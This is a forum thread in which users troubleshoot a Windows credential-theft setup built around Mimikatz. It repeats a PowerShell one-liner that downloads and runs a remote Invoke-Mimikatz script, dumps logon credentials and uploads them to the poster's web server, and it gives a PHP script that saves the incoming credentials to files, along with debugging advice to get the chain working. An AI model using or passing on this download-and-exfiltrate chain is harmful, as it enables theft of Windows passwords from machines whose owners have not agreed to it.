Exmix Posted September 3, 2017 Share Posted September 3, 2017 So thanks to ThoughtfulDev I was able to get this workings very nicely. So after testing it on mine and my cousinsg Windows 7 PC(With his permission of course), those worked great, but when testing with our Windows 10 PC's, I got an error. .#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 .## ^ ##. "A La Vie, A L'Amour" ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 20 modules * * */ ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106 mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) mimikatz(powershell) # exit Bye! I tried this on a few other Windows 10 PC's to make sure it wasn't just those PC's in specific. I was wondering if anyone else has gotten this or might know a way around this or a possible fix. Quote Link to comment Share on other sites More sharing options...
Exmix Posted September 8, 2017 Author Share Posted September 8, 2017 On 9/6/2017 at 11:00 PM, kdodge said: Are you sure your running it as Administrator? 100% Positive. I'm doing it from my Windows10 Laptop, running this script from an administrator command prompt. powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)" With that I still get the Output I put in my first post. Quote Link to comment Share on other sites More sharing options...
Exmix Posted September 9, 2017 Author Share Posted September 9, 2017 (edited) 1 hour ago, kdodge said: It could be a bug, you might try contacting the author. One other thing I can think of, are you running an AV? the description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. I kinda sounds like something is anyway. I am but that is disabled. I know the AV Detects it. Contacting the ower - I posted it here since it was @Darren Kitchen who made the Youtube video on it. Edited September 9, 2017 by Exmix Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted November 18, 2017 Share Posted November 18, 2017 (edited) On 9/8/2017 at 11:49 PM, Exmix said: I am but that is disabled. I know the AV Detects it. Contacting the ower - I posted it here since it was @Darren Kitchen who made the Youtube video on it. Windows 10 has patched lsass now which effectively breaks mimikatz functionality. Edited November 18, 2017 by TeCHemically Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted November 18, 2017 Share Posted November 18, 2017 I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)" Here is the PHP script: <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> it was broken up like this before; but didn't see,m to have any affect (i know almost nothing of PHP; so this probably makes no difference): <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> Thanks to any who reply! Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted November 21, 2017 Share Posted November 21, 2017 (edited) On 11/19/2017 at 1:25 PM, kdodge said: It could be a lot of things, but you should start with checking if the file has write permissions to the server your running this on <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; if(is_writable($file)) file_put_contents($file, file_get_contents("php://input")); else echo $file.' is not writable.'; ?> run tcpdump with this to see if it's not writable. Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input")); So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue! Edited November 21, 2017 by TeCHemically Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.